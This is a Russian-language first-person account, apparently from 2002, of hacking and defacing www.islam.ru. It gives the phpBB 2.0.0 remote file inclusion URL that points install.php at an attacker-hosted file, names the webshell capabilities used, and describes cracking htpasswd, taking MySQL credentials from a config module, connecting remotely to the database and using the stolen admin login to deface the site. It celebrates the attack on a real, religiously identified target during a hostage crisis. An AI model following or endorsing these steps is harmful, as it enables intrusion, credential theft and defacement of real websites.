[НАЧАЛО]
26 октября 2002. Вечер.
Пройдясь по известным мне
сайтам, я остановился
на сайте www.islam.ru.
Наверно я его выбрал потому, что в домене ru,
и его еще никто не ломал :). Полазил,
посмотрел что к чему, и сделал вывод - весь
сайт работает на PHP, пока будем работать с Web-интерфейсом,
демоны позже. С грустью посмотрел на XSpider'а -
не запустил.
Далее составил примерный список всех
скриптов (по названиям), и начал искать их в
Инете. Поисковики столько инфы выплеснули,
причем весьма отдаленной от тематики -
разгребать этот мусор не было времени - надо
делать взлом пока он актуален.
Зашел в форум - обычный, типа UBB, прокручиваю
пейдж - вижу надпись PhpBB 2.0.0. Дас - ну что
проверим?
[BUG]
Explorer: В http://www.securityfocus.com
пишем PhpBB 2.0.0.
Одна ссылка,
заходим. Говорили мне учить английский, но
кое-как я понял, что есть в этом форуме
скрипт install.php, который подгружает и
исполняет файл functions_selects.php из указанной
директории.
Explorer: http://www.islam.ru/phorum/install.php?phpbb_root_dir=/
Он мне отвечает "Cannot find /wwwroot/islam/phorum/includes/functions_selects.php".
Ага! Вот оно как работает, далее почитав
БагТрак понял, что можно подгружать с
других серверов:
http://www.islam.ru/phorum/install.php?phpbb_root_dir=http://www.MYSITE.ru/
Заходим на Narod.ru, быстренько регистрируем
сайт http://install2.narod.ru
(кстати, там и миррор дефейса). Создаем на
народе файл functions_selects.php.
<? Print ("hello\n"); ?>
Explorer: http://www.islam.ru/phorum/install.php?m=http://install2.narod.ru/
Ответ: "Cannot find http://install2.narod.ru/includes/functions_selects.php".
Ааа. Понял - бегом на Народ. Создаем
директорию includes, туда пихаем файл.
Опять пробуем. Ответ: "hello". Уже хорошо.
Теперь надо проверить, что мы можем. Не буду
приводить исходники скрипта, просто опишу
действия.
<?
//просмотр директории
//просмотр файла
//запись файла
//исполнение команды
?>
Ошибка. Недостаточно прав на запись и
исполнение, а просматривать файлы,
директории могу. Значит дефейс будет
сделать труднее. Потихоньку начинаю
скачивать все файлы с сервера. Одновременно
с этим нашел файлы типа htpasswd. John The Ripper начал
работу. Лег спать.
[День ¦2.]
Проснувшись и покушав, включил телевизор,
положение не улучшилось. "Помочь" на
Дубровке я не мог, а вот тут у меня шансы
были-.
JTR дал 0%. Начал изучать исходники и иерархию
директорий. Сразу кинулась в глаза
директория admin. Зашел на www.islam.ru/admin - что-то
типа "Удаленное управление 3.1.9". А где
пароль храниться? Открыл /admin/index.php - пароль
сравнивается с строкой из базы данных (mysql),
скрипт оперирует какими-то переменными $DB,
$DB_SERVER, $DB_LOGIN,$DB_PASSWORD. Посмотрел в начале, а
там загружаемый модуль. Открываю этот
модуль. Есть Логин, Пароль, База Данных, MySQL
сервер.
Мое предположение: работа с MySQL возможна
только с правами Web-сервера (я бы так сделал).
Значит будем через Баг впихивать скрипт для
работы с MySQL, и выводить на экран все, что
вязано с WHEREIS id=0.Сколько я мучился отлаживая
этот скрипт не передать словами, но никак не
хотел он присоединяться к серваку, то одна,
то другая ошибка. Решил оставить муторное
дело.
Вариант второй. Понадеялся на недочет в
системе безопасности (с любого ip можно
подключаться к MySQL серверу). Странно, очень
долго искал клиент, а потом просто набрал в
броузере www.mysql.ru
и опа, такой классный и под винды. Запустил,
ввел данные, 10 секунд ожидания и таблицы,
таблицы и данные, данные :).
В /admin/index.php смотрю из какой таблицы берутся
пароли, открываю ее и пароль есть, логин
есть.
Explorer: www.islam.ru/admin - ввожу логин/пароль.
Передо мной очень много всего, похоже на
автоматическое добавление новостей, но с
расширенными функциями, работает со всеми
страницами сайта. Кликаю на Главную.
Несколько полей ввода: Титл страницы, файл
шапки, Тело, файл ботинок 🙂 ну и т.д. Тело
редактировать - проблем нет, но вот с
файлами шапки и ботинок проблемы были. Если
не правильный файл ввести, вылетала ошибка.
Ну какой дефейс с ошибкой и без тегов :).
Значит единственный результат, задать в
этих полях или пустые файлы, или файлы
которые ничего не отображают. Скоро был
найден такой файл, там были счетчики, против
них ничего плохого не имею. Залил дефейс.
[Послесловие]
На следующий день получил 20 писем,
содержанием от "%#$!$% на ;%¦" до "МОЛОДЦЫ
РЕБЯТА! ТАК ДЕРЖАТЬ!". Так же было письмо
от админа. Предлагал телефон оставить -
наивный. Кстати, админ долго не мог понять,
что у меня пассворд есть, он убил форум. Но я
ему сказал, все исправил, и вроде все там ОК.
Результат. Я удовлетворен, конечно это мало
кому тогда было интересно, но для меня это
было важно. Я высказал свое мнение и позицию
по данной проблеме.
P.S. Чуть не забыл, огромный привет LJ и
компании c канала #xakep (irc.dal.net.ru).
WingGod
Rootteam http://www.sysworld.net